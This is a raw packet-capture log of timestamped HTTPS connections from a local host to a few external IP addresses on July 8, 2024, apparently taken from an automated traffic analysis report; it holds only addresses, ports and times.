                            Jul 8, 2024 10:09:26.973901987 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.973913908 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.973938942 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.973970890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.973978043 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.974107027 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.974817038 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.974843025 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.974869013 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.974873066 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.974881887 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.974906921 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.974924088 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.975860119 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.975876093 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.975914001 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.975919008 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.975936890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.976357937 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.976402044 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.976418018 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.976424932 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.976458073 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.976738930 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.976783991 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.977720976 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.977737904 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.977782011 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.977787971 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:26.977793932 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:26.977819920 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.028973103 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.067529917 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.067552090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.067589998 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.067611933 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.067625046 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.067667961 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.068217039 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.068233013 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.068281889 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.068291903 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.068330050 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.068732023 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.068773985 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.068790913 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.068799019 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.068810940 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.068840027 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.069629908 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.069648027 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.069684029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.069689035 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.069694996 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.069725037 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.070650101 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.070668936 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.070712090 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.070722103 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.070749998 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.071635962 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.071655035 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.071691036 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.071697950 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.071722031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.072644949 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.072683096 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.072705984 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.072714090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.072740078 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.072760105 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.116902113 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.116921902 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.116959095 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.116983891 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.117001057 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.117043018 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.163276911 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.163302898 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.163351059 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.163374901 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.163386106 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.163427114 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.164287090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.164309978 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.164349079 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.164356947 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.164365053 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.164396048 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.165059090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.165081978 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.165117979 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.165123940 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.165148973 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.167452097 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.167470932 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.167507887 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.167515993 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.167560101 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.167782068 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.167804003 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.167829990 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.167835951 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.167862892 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.168157101 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.168191910 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.168224096 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.168231964 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.168262005 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.168926001 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.168957949 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.168991089 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.168992043 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.169013023 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.169025898 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.169054985 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.175319910 CEST44349716172.67.167.249192.168.2.12
                            Jul 8, 2024 10:09:27.175427914 CEST44349716172.67.167.249192.168.2.12
                            Jul 8, 2024 10:09:27.175510883 CEST49716443192.168.2.12172.67.167.249
                            Jul 8, 2024 10:09:27.203344107 CEST49716443192.168.2.12172.67.167.249
                            Jul 8, 2024 10:09:27.203402042 CEST44349716172.67.167.249192.168.2.12
                            Jul 8, 2024 10:09:27.258816957 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.258843899 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.258893967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.258903027 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.258914948 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.258959055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.259423018 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259438992 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259475946 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259480000 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.259490967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259500027 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.259535074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.259829998 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259845972 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259887934 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259903908 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.259912014 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.259938002 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.262861967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.262881994 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.262944937 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.262955904 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263370037 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263386011 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263426065 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.263432026 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263469934 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.263715029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263734102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263768911 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.263777018 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.263788939 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.264028072 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.264041901 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.264071941 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.264091015 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.264100075 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.281513929 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.288378000 CEST49721443192.168.2.12172.67.167.249
                            Jul 8, 2024 10:09:27.288402081 CEST44349721172.67.167.249192.168.2.12
                            Jul 8, 2024 10:09:27.288470984 CEST49721443192.168.2.12172.67.167.249
                            Jul 8, 2024 10:09:27.288712025 CEST49721443192.168.2.12172.67.167.249
                            Jul 8, 2024 10:09:27.288723946 CEST44349721172.67.167.249192.168.2.12
                            Jul 8, 2024 10:09:27.319825888 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.319854975 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.319895983 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.319897890 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.319907904 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.319941044 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357104063 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357125998 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357167006 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357175112 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357227087 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357413054 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357429028 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357453108 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357479095 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357485056 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357505083 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357595921 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357737064 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357764959 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357796907 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357810974 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357820034 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.357832909 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.357832909 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.359041929 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359065056 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359117031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.359126091 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359162092 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.359513044 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359527111 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359592915 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.359592915 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.359600067 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359707117 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359726906 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359778881 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.359786987 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.359798908 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.360542059 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.360575914 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.360606909 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.360609055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.360616922 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.360640049 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.360655069 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.452420950 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452446938 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452518940 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452543974 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.452554941 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452589035 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.452769995 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452800035 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452832937 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.452838898 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.452866077 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.453083992 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.453120947 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.453176022 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.453176975 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.453176975 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.453188896 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454133034 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454166889 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454206944 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454212904 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.454222918 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454271078 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.454271078 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.454868078 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454889059 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454919100 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454952002 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.454957008 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.454988956 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.455235958 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.455254078 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.455321074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.455328941 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.455362082 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.455763102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.455776930 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.455828905 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.455837965 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.455851078 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.497487068 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.511286974 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.511308908 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.511359930 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.511368990 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.511415005 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.511415005 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.511423111 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549113989 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549138069 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549181938 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.549191952 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549232006 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549235106 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.549263954 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549287081 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.549293041 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549340963 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.549626112 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549659967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549685955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.549690962 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549705029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.549720049 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.549756050 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.550487041 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550504923 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550544024 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550565958 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.550571918 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550607920 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.550899029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550918102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550955057 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.550961018 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.550976992 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.551328897 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.551361084 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.551400900 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.551408052 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.551451921 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.551451921 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.552035093 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.552057028 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.552114964 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.552122116 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.552156925 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.552167892 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.552613974 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.571419954 CEST4434972020.114.59.183192.168.2.12
                            Jul 8, 2024 10:09:27.571495056 CEST49720443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:09:27.593539000 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.617778063 CEST49720443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:09:27.617794037 CEST4434972020.114.59.183192.168.2.12
                            Jul 8, 2024 10:09:27.618215084 CEST4434972020.114.59.183192.168.2.12
                            Jul 8, 2024 10:09:27.644253016 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644274950 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644330025 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644330978 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.644340992 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644377947 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.644838095 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644853115 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644892931 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.644911051 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.644922018 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645114899 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645133972 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645174026 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.645179987 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645199060 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.645432949 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645447969 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645498037 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.645509958 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.645585060 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.646614075 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.646629095 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.646656036 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.646713018 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.646718025 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.646728039 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.647075891 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647100925 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647121906 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.647135019 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647175074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.647181034 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647427082 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647444963 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647480965 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.647489071 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.647515059 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.647535086 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:27.647545099 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:27.666574001 CEST49720443192.168.2.1220.114.59.183
